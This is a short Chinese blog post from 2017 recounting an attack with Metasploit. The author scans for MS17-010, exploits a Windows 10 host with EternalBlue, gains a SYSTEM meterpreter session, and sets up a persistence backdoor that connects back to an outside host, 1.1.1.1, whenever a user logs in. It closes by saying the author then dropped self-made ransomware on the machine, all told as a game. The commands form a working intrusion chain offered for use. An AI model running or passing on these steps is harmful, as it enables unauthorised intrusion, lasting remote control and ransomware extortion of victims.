记一次 MSF 实战
May 28, 2017
最近正好有 ms17_010 这种好用的洞,为什么不好好玩玩呢?
远端准备好监听。
msf > use use exploit/multi/handler |
然后就开始扫机器看看有没有漏洞咯?
# 先打开 msfconsole |
然后就是等待,等他扫到东西再说。
过一会(打了会炉石)就会有反应啦。
2.2.2.2:445 - Host is likely VULNERABLE to MS17-010! (Windows 10 Pro 14393) |
然后就可以打了。
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue |
过一会应该就有 session。
msf exploit(ms17_010_eternalblue) > sessions -i |
首先看一眼自己的权限,这次运气比较好直接拿到了 SYSTEM。
meterpreter > getuid |
进入 meterpreter 之后就可以开个长久的监听了。
meterpreter > run persistence -U -i 5 -p 5353 -r 1.1.1.1 # 用户登录的时候开始反弹 |
接下来就可以玩了~
于是随手做了个 Ransomware 丢上去试了试(
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.